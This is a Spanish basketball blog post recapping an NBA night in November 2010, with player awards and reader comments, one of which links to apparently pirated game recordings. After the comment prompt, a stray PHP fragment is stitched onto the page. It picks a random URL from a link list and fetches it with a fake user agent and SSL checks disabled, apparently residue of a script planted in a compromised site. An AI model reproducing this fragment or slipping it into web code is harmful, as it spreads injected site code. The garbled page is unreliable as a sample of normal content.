La crónica (26/11/2010)

27 de November de 2010 por TheDeerHunter

Veamos qué es lo que nos deparó la maratoniana jornada de  anoche.

Cayeron los Spurs. Los Mavs cortaron la racha como hace poco ya hicieron con la de los Hornets. Los hombres de Carlisle han dado con la tecla y “los acabados” del equipo están en un estado de forma increíble. Ayer Kidd le amargó la vida a Parker como hacía años no sucedía, Chandler destrozó a Blair y Splitter, Marion se comió a Jefferson, y de colofón Dirk ganándole la partida a Duncan.

Los Lakers también se quemaron en Salt Lake. Empezaron jugando de maravilla, con los Jazz casi entregados. Por primera vez este curso la segunda unidad salió mal y los Jazz cogieron aire. Conforme fue desarrollándose el partido los locales fueron ganando confianza, a partir de un clinic de Deron Williams. Victoria justa de los Jazz.

Los Hornets aprovecharon las dos derrotas para volver a la cabeza y lo hicieron arrasando a los Blazers en la vuelta de Roy. Él único que se salvó de la quema fue precisamente él. A los Hornets les salió el partido perfecto y a los Blazers para olvidar. Se quedan a un paso de perder la plaza de playoffs. Rudy encima se lesionó.

Los perseguidores Thunder y Nuggets obtuvieron victorias de infarto. Los primeros necesitaron de un 43-8-8 de Westbrook y de una prórroga para doblegar a unos incómodos Pacers. El otro partido, Melo puso otra marca más en su amplio historial de “winners” dejando con cara de bobos a unos Bulls sin Rose. Un poco más fácil lo tuvieron los Suns sobre Clippers y los Grizzlies sobre los Warriors.

Pasando al Este, ganaron todos los capos. Los Celtics tuvieron que ponerse serios para que Toronto no les volviera a comer la tostada. Calderón estuvo como en sus mejores días y el baloncesto ofensivo/colectivo de Toronto fluyó por sus venas. Precioso duelo de dirección con Rondo. Fueron los hombres grandes verdes los que marcaron la diferencia.

Orlando les marca de cerca con su “democrática” victoria sobre Cleveland… y Miami por fin recuperó la senda de la victoria sufriendo contra Philadelphia. El Big Three funcionó muy bien y Dampier no debutó. Por último, Detroit cuajó un gran partido contra Milwaukee y los Bobcats ganaron a Houston.

PREMIOS

MVP: Va de bases. Extraordinario Deron Williams contra los Lakers… pero este Russell Westbrook viene siendo el verdadero líder de los Thunder de Durant. Anoche excesivo: 43 puntos, 8 rebotes, 8 asistencias, 3 robos y un tapón. Eso sí, con prórroga de por medio.

El rookie: Blake Griffin a lo suyo. Esto es 20-14 anoche y maravillando por su juego. No hay quien le tosa en esta carrera.

La sorpresa: No sirvió de mucho, pero el 28-21 de Andris Biedrins nos ha dejado alucinados. Hace no mucho tiempo no nos hubiera sorprendido tanto. ¿Qué es lo que le pasó al letón?

La decepción: Parker se comió un -17 en la derrota de su equipo. Esto decanta la balanza en el debate que tuvimos el otro día. Ginobili fue el mejor de los Spurs.

El mayor esfuerzo en vano: Podemos nombrar a mucha gente, pero nos quedaremos con Granger que hacía tiempo que no aparecía por aquí. Es por aquello que encima el esfuerzo fue de 44 minutazos que no sirvieron para nada.

Comenta

6 comentarios a esta entrada

  1. Denise dice:
    #1

    Por fin despertaron Quentin, Duhon y Redick. Han necesitado un cuarto de temporada para aparecer, mal presagio. Fácil victoria anoche ante Cavs, otra banda más del Este.
    Los Warriors empezaron bien, pero ya no dan para más, están cayendo en picado. Por los Grizzlies, Marc tampoco ha empezado muy fino la temporada.
    Que pedazo primer cuarto de Lakers y vaya manera de perder un partido. Priemro dejandose remontar 17 puntos en 8 minutos ante unos Jazz que en esos momentos de vendaval angelino se hubieran conformado con perder por menos de 30, y después el último minuto lo jugaron de forma horrible, con una deplorable selección de tiro. No quiero ser oportunista pero si me dicen que el hombre que les entrena tiene 11 anillos, no me lo creo. Ganan de 3, Deron les clava un triplazo (entra dentro de lo normal), Kobe pierde un balón tontisimo en medio campo, y después no se le ocurra otra cosa a Phil (supongo que lo decidió él) que remontar el partido haciendo que Artest se tire dos mandarinas, teniendo a Kobe on-fire que dos minutos antes se había cascado 14 puntos consecutivos (tres triples incluidos). También les condenó el pésimo acierto en el tiro de 3, y la mala noche de Blake que emuló a Vujacic fallandolo todo, y Brown que recordó a Farmar.
    Mencionar también la pedazo primera parte de Pau anotandolo casi todo, en la segunda, ni se le vió el pelo, supongo que acusando el cansancio.

      Citar

  2. -=TheKing=- dice:
    #2

    Dios que partidazo el de los LA-UTH impresionate la capacidad de liderazgo de D-Will, cada día que pienso que CP3 se acerca veo a Deron que me demuestra lo contrario, podrá acercarse en las estadísticas y en el nivel de juego generarl pero en la hora de la verdada ante equipos grandes D-Will hasta el momento ha demostrado que es mucho más grande.
    Gran racha anotadora de Kobe en el último cuarto creo que 14 seguidos y muy mal Fisher por las faltas.

    1er Tiempo:
    http://hotfile.com/dl/85244241/7e219…ura-1.avi.html
    http://hotfile.com/dl/85248034/e3e0d…ura-2.avi.html

    2do Tiempo:
    http://www.fileserve.com/file/GZhUCZ7
    http://www.fileserve.com/file/shbJMdC

    no se si se puede colgar esto si no disculpen el error

      Citar

  3. -=TheKing=- dice:
    #3

      Citar

  4. Rompe dice:
    #4

    Cómo les cambia la cara a los Warriors la presencia de Lee. Desde su lesión no levantan cabeza, cuando empezaron francamente bien.
    Por los Jazz, se están aficionando a eso de las grandes remontadas eh? Como les de por eso en PO lo pasarán mal sus sufridos fans! xD
    Y como curiosidad… el rey de las asistencias, Rondo, fue vencido por un sorprendente Calderón, que le ha sentado la titularidad como nunca! 15 asistencias para el chaval!

      Citar

  5. Jose Luis dice:
    #5

    Lo de Utah fue de traca. Yendo Lakers 3 arriba a falta de 1 minuto y poco, tira kirilenko una mandarina que no toca ni aro, da en Gasol y dan bola a Utah con 13 segundos, correcto. Sacan, juegan, hay otro saque de fondo y el reloj de posesión ¡¡sigue en 13 segundos!! cuando deberían quedar 6 o menos. Y claro, sacaron de fondo, abrieron atrás, y Deron se casca el triplazo cuando quedaban menos de 3 segundos (una jugada que no hubiera dado tiempo de tener el reloj de posesión en 6). Y después, por el reloj de posesión se cortaron contras de los Lakers y alguna jugada con emparejamientos favorables a los visitantes, pero cuando atacaba Utah, ya podía estar el reloj parado que no pasa nada, sigan jugando.

    Mala noche en los triples, y Gasol reventado en la 2ª parte. Kobe tuvo dos minutos magníficos, pero en el 3er cuarto había fallado un par de ellas bastante fáciles. En fin, caer en Utah es una derrota “posible”, siempre es una cancha muy complicada.

      Citar

  6. Scriers dice:
    #6

    El problema para Deron es que caen en regular season, pero los playoff son otra historia. ayer vi orlando ganar a cavs y contando mucho con Howard y a los rockets perder un partido que llevaban bien contra los bobcats. houston es el primer fracaso serio serio de la temporada. Creo que tienen para mas. Los demas partidos dejan a los mavs en buen lugar. Cortar la racha a los Spurs tiene merito. sorprende que toronto haya sido competitivo durante, ya, cinco o seis partidos seguidos. Con los extranjeros aprovechando mas y mejor los minutos que derozan y weems. Me refieroa kleiza, Barbosa e incluso pedja, que juega poco pero enchufa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>